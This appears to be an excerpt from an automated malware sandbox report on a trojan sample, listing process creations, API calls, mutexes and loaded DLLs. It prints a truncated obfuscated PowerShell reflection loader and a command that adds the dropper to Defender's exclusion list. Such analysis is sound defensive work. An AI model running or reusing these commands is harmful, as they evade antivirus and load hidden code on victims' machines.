                              Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}H
                              Source: System.evtx.21.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeP
                              Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
                              Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.drBinary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
                              Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.21.drBinary string: L\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
                              Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                              Source: Security.evtx.21.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.syss
                              Source: Microsoft-Windows-SMBServer%4Operational.evtx.21.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                              Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.21.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
                              Source: Microsoft-Windows-SMBServer%4Operational.evtx.21.drBinary string: \Device\NetbiosSmb
                              Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                              Source: System.evtx.21.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
                              Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              Source: System.evtx.21.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
                              Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                              Source: Microsoft-Windows-SMBServer%4Operational.evtx.21.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                              Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}4
                              Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
                              Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.21.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                              Source: Microsoft-Windows-SMBServer%4Operational.evtx.21.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                              Source: System.evtx.21.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4%%
                              Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                              Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                              Source: System.evtx.21.drBinary string: C:\Device\HarddiskVolume3irec`
                              Source: classification engineClassification label: mal100.troj.evad.winEXE@16/81@3/4
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140002DDC GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,6_2_0000000140002DDC
                              Source: C:\ProgramData\Install.exeCode function: 2_2_007C151A SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,2_2_007C151A
                              Source: C:\ProgramData\Install.exeCode function: 2_2_007C17A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,2_2_007C17A5
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RdLfpZY5A9.exe.logJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7460:120:WilError_03
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeMutant created: \Sessions\1\BaseNamedObjects\jiLAdNeWyW3VITIoy
                              Source: C:\ProgramData\KrnlSetupSus.exeMutant created: \Sessions\1\BaseNamedObjects\KjpilRmwK24FRp3u
                              Source: C:\ProgramData\KrnlSetupSus.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                              Source: RdLfpZY5A9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RdLfpZY5A9.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: RdLfpZY5A9.exeReversingLabs: Detection: 65%
                              Source: unknownProcess created: C:\Users\user\Desktop\RdLfpZY5A9.exe "C:\Users\user\Desktop\RdLfpZY5A9.exe"
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess created: C:\ProgramData\Install.exe "C:\ProgramData\Install.exe"
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess created: C:\ProgramData\KrnlSetupSus.exe "C:\ProgramData\KrnlSetupSus.exe"
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess created: C:\ProgramData\Install.exe "C:\ProgramData\Install.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess created: C:\ProgramData\KrnlSetupSus.exe "C:\ProgramData\KrnlSetupSus.exe" Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: unknown unknownJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: unknown unknownJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: unknown unknownJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}Jump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\ProgramData\Install.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: slc.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: pdh.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: avicap32.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: msvfw32.dllJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dllJump to behavior
                              Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
